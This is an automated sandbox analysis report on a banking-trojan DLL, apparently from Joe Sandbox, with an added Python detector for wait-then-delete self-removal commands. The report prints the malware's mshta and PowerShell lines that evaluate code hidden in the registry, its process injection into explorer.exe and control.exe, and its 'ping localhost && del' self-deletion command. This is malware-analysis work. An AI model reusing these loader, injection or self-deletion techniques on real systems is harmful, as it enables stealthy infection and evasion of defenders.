                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exe; Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A15FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary

                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: lokvQRcUe0.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F78E57 CreateProcessAsUserW
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A14321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A16D0A NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A1190C GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A184C1 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F674AE NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F6C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F76DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F7BE80 NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F70782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F700DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F7A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F761AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F77950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F6710A GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F72331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F75312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F664C4 memset,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F636BB NtGetContextThread,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F6B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F6D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F610C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F73829 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F7EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F75220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DA40C0 NtReadVirtualMemory
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DB583C NtCreateSection
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DB41D8 NtMapViewOfSection
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DCA148 NtQueryInformationProcess
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DAAA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DC04CC NtAllocateVirtualMemory
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DA65E4 NtQueryInformationToken,NtQueryInformationToken,NtClose
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DA6D24 NtWriteVirtualMemory
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DA9660 NtSetContextThread,NtUnmapViewOfSection,NtClose
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DDF00C NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DDF36C NtProtectVirtualMemory
                      Source: lokvQRcUe0.dll; Binary or memory string: OriginalFilenamemyfile.exe$ vs lokvQRcUe0.dll
                      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: lokvQRcUe0.dll; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lokvQRcUe0.dll; ReversingLabs: Detection: 48%
                      Source: lokvQRcUe0.dll; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown; Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll"
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424
                      Source: unknown; Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exe; Process created: unknown unknown
                      Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\Documents\20220526
                      Source: C:\Windows\SysWOW64\WerFault.exe; File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC52.tmp
                      Source: classification engine; Classification label: mal100.bank.troj.evad.winDLL@27/28@0/1
                      Source: C:\Windows\System32\mshta.exe; File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A168BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352
                      Source: C:\Windows\System32\control.exe; Mutant created: \Sessions\1\BaseNamedObjects\{98D9F3EF-1790-8A6E-614C-3B5E25409F72}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\1\BaseNamedObjects\{A88D448E-E714-1A0D-B15C-0BEE75506F02}
                      Source: C:\Windows\SysWOW64\rundll32.exe; Mutant created: \Sessions\1\BaseNamedObjects\{5034037C-6F7B-0272-7984-1356BDF8F7EA}
                      Source: C:\Windows\SysWOW64\rundll32.exe; File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe; File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder; Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.249261559.000000000040D000.00000002.00000001.01000000.00000003.sdmp, lokvQRcUe0.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A17EA0 push ecx; ret 2_2_04A17EA9
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A1828B push ecx; ret 2_2_04A1829B
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F63495 push ecx; mov dword ptr [esp], 00000002h 2_2_04F63496
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F83D9F push ecx; ret 2_2_04F83DAF
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F838A0 push ecx; ret 2_2_04F838A9
                      Source: C:\Windows\System32\control.exe; Code function: 34_2_00DC4492 push ss; ret 34_2_00DC4493
                      Source: lokvQRcUe0.dll; Static PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey
                      Source: lokvQRcUe0.dll; Static PE information: real checksum: 0x79835 should be: 0x7114c
                      Source: b5khtopv.dll.28.dr; Static PE information: real checksum: 0x0 should be: 0x671e
                      Source: kikzslfg.dll.30.dr; Static PE information: real checksum: 0x0 should be: 0x41ac
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: C:\Users\user\AppData\Local\Temp\b5khtopv.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: C:\Users\user\AppData\Local\Temp\kikzslfg.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
Source: C:\Windows\explorer.exe Process created: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll"
Source: C:\Windows\explorer.exe Process created: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll"
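The two lines above are the evidence behind the "Self deletion via cmd delete" signature: the injected explorer.exe runs cmd.exe with a ping to localhost that exists only as a delay, then deletes the sample from the Desktop once the loader has released the file. The detector below is an added example, not part of this report or of Joe Sandbox. It reads process-creation records of a constructed shape ({parent, image, cmdline}), recognises ping, timeout and choice as the delay primitive, and requires the delay to precede the delete on the same command line so that plain cleanup scripts and connectivity checks do not fire. The first sample record is the report's command line; the others are made up, including the hypothetical stage2.exe path.

```python
"""Flag the 'wait, then delete' self-removal pattern in process-creation events.

Added example; this is not Joe Sandbox code. The report above shows the
injected explorer.exe spawning
    cmd.exe /C ping localhost -n 5 && del "<the dropped DLL>"
The ping only exists to wait until the loader has let go of the file; the
del is the point. The event shape and the sample records are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional

_LOOPBACK = r"(?:127\.0\.0\.1|localhost|::1)"
# Delay primitives seen in this pattern: ping -n N <loopback> (either argument
# order), timeout [/t] N, choice ... /t N.
_DELAY_RE = re.compile(
    rf"\bping\s+(?:-n\s+(?P<ping_pre>\d+)\s+{_LOOPBACK}|{_LOOPBACK}\s+-n\s+(?P<ping_post>\d+))"
    r"|\btimeout(?:\.exe)?\s+(?:/t\s+)?(?P<timeout>\d+)"
    r"|\bchoice(?:\.exe)?\b[^&|]*?/t\s+(?P<choice>\d+)",
    re.IGNORECASE,
)
# del or erase, optional single-letter switches, then a quoted or bare path.
_DEL_RE = re.compile(
    r"\b(?:del|erase)\b(?:\s+/[a-z])*\s+(?:\"(?P<quoted>[^\"]+)\"|(?P<bare>[^\s&|]+))",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class SelfDelete:
    parent_image: str
    delay_via: str       # "ping", "timeout" or "choice"
    delay_seconds: int   # nominal: ping -n N on loopback waits roughly N seconds
    target: str          # file handed to del/erase


def parse_self_delete(parent_image: str, cmdline: str) -> Optional[SelfDelete]:
    """Return a finding when cmdline waits and then deletes a file, else None.

    The delay has to come before the delete on the same line: a bare del
    (cleanup script) or a bare ping (connectivity check) does not qualify.
    """
    delay = _DELAY_RE.search(cmdline)
    if delay is None:
        return None
    dele = _DEL_RE.search(cmdline, delay.end())
    if dele is None:
        return None
    name, secs = next((k, v) for k, v in delay.groupdict().items() if v is not None)
    via = name.split("_")[0]          # ping_pre / ping_post both report as "ping"
    target = dele.group("quoted") or dele.group("bare")
    return SelfDelete(parent_image, via, int(secs), target)


def scan(events: Iterable[dict]) -> list:
    """Run the check over events shaped like {"parent", "image", "cmdline"}; only cmd.exe children are examined."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("\\cmd.exe"):
            continue
        hit = parse_self_delete(ev["parent"], ev["cmdline"])
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed records. The first mirrors the report line above; the rest are made up.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll"'},
    {"parent": r"C:\Users\user\AppData\Local\Temp\stage2.exe",   # hypothetical dropper path
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c timeout /t 3 & del /f /q C:\Users\user\AppData\Local\Temp\stage2.exe"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del /q C:\Temp\old.log"},               # benign: delete, no wait
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ping localhost -n 2"},                   # benign: wait, no delete
]

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.parent_image} waits ~{h.delay_seconds}s via {h.delay_via}, then deletes {h.target}")
```

The parent image is carried through because it is the useful context for triage: an explorer.exe that spawns a delayed delete of a DLL on the Desktop is far more telling than the cmd.exe itself.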
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (7 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 occurrences, one per WerFault.exe instance, each followed by 19 NOOPENFILEERRORBOX entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (57 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (68 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1928 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\control.exe TID: 3396 Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b5khtopv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kikzslfg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3110
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04F665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04F699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04F7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04F6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree
Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:eEE|
Source: explorer.exe, 00000025.00000000.419693379.000000000814C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000025.00000000.415342028.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000025.00000000.446215428.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
